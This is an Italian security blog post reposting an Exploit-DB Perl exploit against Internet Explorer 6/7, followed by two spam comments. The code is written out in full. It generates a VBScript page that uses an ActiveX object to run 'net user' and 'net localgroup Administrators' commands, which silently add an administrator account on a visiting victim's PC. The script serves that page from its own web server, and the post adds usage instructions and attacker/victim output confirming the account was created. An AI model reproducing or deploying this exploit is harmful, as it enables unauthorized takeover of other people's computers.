Andrea Draghetti aka Drego. I analyze and contrast the Phishing at D3Lab and I'm team member of BackBox Linux! PhishingArmy and meioc is my projects!

Internet Explorer – Remote User Add Exploit

3 min read

Exploit-db ha recentemente pubblicato un exploit che affligge Internet Exploit 6 e 7 che permetterebbe l’aggiunta di utenti Amministratori ad un PC mediante la semplice navigazione internet. Questo permetterebbe a malintenzionati di accedere al proprio PC con un utente creato ad hoc  con permessi amministrativi ed accesso remoto.

Dopo il salto l’exploit…

# Exploit Title: Internet Explorer ( 6/7) Remote Code Execution -Remote User Add Exploit
# Date: 15/02/2010
# Author: Sioma Labs
# Software Link: N/A
# Version: IE 7
# Tested on: Windows XP sp2
# CVE :
# Code :

#!/usr/bin/perl

use strict;
use Socket;
use IO::Socket;
print "\n";
print "800008                           8                      \n";
print "8      e  eeeee eeeeeee eeeee    8     eeeee eeeee  eeeee\n";
print "8eeeee 8  8  88 8  8  8 8   8    8e    8   8 8   8  8   | \n";
print "    88 8e 8   8 8e 8  8 8eee8    88    8eee8 8eee8e 8eeee \n";
print "e   88 88 8   8 88 8  8 88  8    88    88  8 88   8    88 \n";
print "8eee88 88 8eee8 88 8  8 88  8    88eee 88  8 88eee8 8ee88 \n";
print "-----------------------------------------------------------\n";
print " Useage : $0 Port \n";
print " Please Read the Instruction befor you use this \n";
print " ---------------------------------\n";

sub parse_form {
 my $data = $_[0];
 my %data;
 foreach (split /&/, $data) {
 my ($key, $val) = split /=/;
 $val =~ s/\+/ /g;
 $val =~ s/%(..)/chr(hex($1))/eg;
 $data{$key} = $val;}
 return %data; }

my $port = shift;
defined($port) or die "Usage: $0 Port \n";
mkdir("public_html", 0777) || print $!;
my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html";

print " [+] Account Name : "; chomp(my $acc=<STDIN>);
print " [+] Account Password : "; chomp(my $pass=<STDIN>);
print " [+] Your IP : "; chomp (my $ip=<STDIN>);
#------------- Exploit -----------------
my $iexplt= "public_html/index.html";
 open (myfile, ">>$iexplt");
 print myfile "<html>\n";
 print myfile "<title> IE User Add Test </title>\n";
 print myfile "<head>";
 print myfile "</font></b></p>\n";
 print myfile "<p>\n";
 print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n";
 print myfile  "></object>\n";
 print myfile  "<script language='vbscript'>\n";
 print myfile  "adduser=";
 print myfile '"cmd';
 print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc ";
 print myfile '/add"';
 print myfile "\n";
 print myfile "exploit.run adduser \n";
 print myfile "\n </script></p>\n";
 print " [+] ----------------------------------------\n";
 print " [-] Link Genetrated : http://$ip:$port/index.html\n";
 close (myfile);
#------------------------------------

my $server = new IO::Socket::INET(Proto => 'tcp',
 LocalPort => $port,
 Listen => SOMAXCONN,
 Reuse => 1);
$server or die "Unable to create server socket: $!" ;

while (my $client = $server->accept()) {
 $client->autoflush(1);
 my %request = ();
 my %data;

 {

 local $/ = Socket::CRLF;
 while (<$client>) {
 chomp;
 if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) {
 $request{METHOD} = uc $1;
 $request{URL} = $2;
 $request{HTTP_VERSION} = $3;
 }
 elsif (/:/) {
 (my $type, my $val) = split /:/, $_, 2;
 $type =~ s/^\s+//;
 foreach ($type, $val) {
 s/^\s+//;
 s/\s+$//;
 }
 $request{lc $type} = $val;
 }
 elsif (/^$/) {
 read($client, $request{CONTENT}, $request{'content-length'})
 if defined $request{'content-length'};
 last;
 }
 }
 }


 if ($request{METHOD} eq 'GET') {
 if ($request{URL} =~ /(.*)\?(.*)/) {
 $request{URL} = $1;
 $request{CONTENT} = $2;
 %data = parse_form($request{CONTENT});
 } else {
 %data = ();
 }
 $data{"_method"} = "GET";
 } elsif ($request{METHOD} eq 'POST') {
 %data = parse_form($request{CONTENT});
 $data{"_method"} = "POST";
 } else {
 $data{"_method"} = "ERROR";
 }


 my $localfile = $DOCUMENT_ROOT.$request{URL};


 if (open(FILE, "<$localfile")) {
 print $client "HTTP/1.0 200 OK", Socket::CRLF;
 print $client "Content-type: text/html", Socket::CRLF;
 print $client Socket::CRLF;
 my $buffer;
 while (read(FILE, $buffer, 4096)) {
 print $client $buffer;
 }
 $data{"_status"} = "200";
 }
 else {
 print $client "HTTP/1.0 404 Not Found", Socket::CRLF;
 print $client Socket::CRLF;
 print $client "<html><body>404 Not Found</body></html>";
 $data{"_status"} = "404";
 }
 close(FILE);


 print ($DOCUMENT_ROOT.$request{URL},"\n");
 foreach (keys(%data)) {
 print ("   $_ = $data{$_}\n"); }


 close $client;
 # Sioma Labs
 # http://siomalabs.com
 # Sioma Agent 154
}
#Instructions
#-----------
#
# This has been tested on windows envirnment(VisTa) . and the victom OS was windows xp sp2 ( InterNET eXplorer 7 )
# To use this on remote PC the generated link should be on victims trusted site list (tools >Internet Option> Security > Trusted Site> Sites)
# No requrement to run it locally . just open the exploit(public_html/index.html) with the IE
# Test Run ( Used OS : Vista) / ( Victim Os : XP SP2 )
# -------------------------------------------------------------
#
# Attacker
# =============
#
#
# E:\>ie.pl 123
#
#800008                           8
#8      e  eeeee eeeeeee eeeee    8     eeeee eeeee  eeeee
#8eeeee 8  8  88 8  8  8 8   8    8e    8   8 8   8  8   |
#    88 8e 8   8 8e 8  8 8eee8    88    8eee8 8eee8e 8eeee
#e   88 88 8   8 88 8  8 88  8    88    88  8 88   8    88
#8eee88 88 8eee8 88 8  8 88  8    88eee 88  8 88eee8 8ee88
#-----------------------------------------------------------
# Useage : E:\ie.pl Port
# Please Read the Instruction befor you use this \n";
# ---------------------------------
#[+] Account Name : test
# [+] Account Password : test
# [+] Your IP : 192.168.1.102
# [+] ----------------------------------------
# [-] Link Genetrated : http://192.168.1.102:123/index.html
#
#------------------------------------------------------------>
# Not Tested on Linux ( Should Work on it too) #
#
# Victim
#========
# Befor -
# C:\>net user
#
#User accounts for \\PC-00583E3C730C
#
#-------------------------------------------------------------------------------
#Administrator            SiomaPC                Guest
#HelpAssistant            SUPPORT_388945a0
#The command completed successfully.
#
# After -
#C:\>net user
#
#User accounts for \\PC-00583E3C730C
#
#-------------------------------------------------------------------------------
#Administrator            SiomaPC                Guest
#HelpAssistant            SUPPORT_388945a0        test
#The command completed successfully.
#
#C:\>
# ============================================================================
# The "test" user has been created successfully
#
# Delete The "Public_Html\index.html" If you use this for the 2nd time

Andrea Draghetti aka Drego. I analyze and contrast the Phishing at D3Lab and I'm team member of BackBox Linux! PhishingArmy and meioc is my projects!

Attacco ARP/DNS Spoofing per recuperare informazione private

Il blog Security Obscurity ha recentemente pubblicato un interessante video in cui mostra come un utente malintenzionato può recuperare le credenziale degli utenti che...
Andrea Draghetti
33 sec read

2
Lascia un commento

Rispondi

  Subscribe  
più nuovi più vecchi più votati
Notificami
nike air force 1
Ospite

Hhe article's content rich variety which make us move for our mood after reading this article. surprise, here you will find what you want! Recently, I found some wedsites which commodity is colorful of fashion.
http://www.inin-from.com

nike air force 1
Ospite

Hhe article's content rich variety which make us move for our mood after reading this article. surprise, here you will find what you want! Recently, I found some wedsites which commodity is colorful of fashion.
http://www.inin-from.com